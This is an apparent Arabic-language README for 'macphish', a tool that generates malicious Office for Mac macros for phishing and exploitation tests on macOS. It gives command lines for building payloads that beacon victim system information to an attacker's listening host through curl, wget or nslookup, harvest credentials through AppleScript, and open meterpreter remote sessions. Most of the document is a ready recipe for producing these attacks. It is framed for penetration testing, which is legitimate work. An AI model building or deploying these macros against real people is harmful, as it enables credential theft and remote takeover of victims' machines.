
يولد ماكروات ضارة لـ Office for Mac مع حمولات beacon وcredential harvesting وmeterpreter لاختبار التصيد والاستغلال على macOS.
مولّد حمولة ماكرو لـ Office على Mac

هناك 4 نواقل هجوم متاحة:
بالنسبة لطريقة 'creds'، يمكن لـ macphish توليد سكريبت Applescript مباشرة، في حال احتجت لتشغيله من شل.
عند التنفيذ، ستقوم هذه الحمولة بإرسال إشارة إلى المضيف المستمع لدينا وتوفير معلومات أساسية عن النظام الخاص بالضحية. أبسط طريقة لتوليد حمولة beacon هي:
$./macphish.py -lh <listening host>
افتراضيًا، يستخدم curl لكن يمكن استخدام أدوات أخرى (wget, nslookup) عن طريق تعديل قالب الأمر.
$./macphish.py -lh <listening host> -lp <listening port> -a creds
أبسط طريقة لتوليد حمولة meterpreter هي:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
لتوليد حمولة meterpreter تستدعي GrantAccessToMultipleFiles() أولاً:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
بالنسبة لهجمات meterpreter، فقط حمولات python مدعومة في الوقت الحالي.
انظر https://github.com/cldrn/macphish/wiki/Usage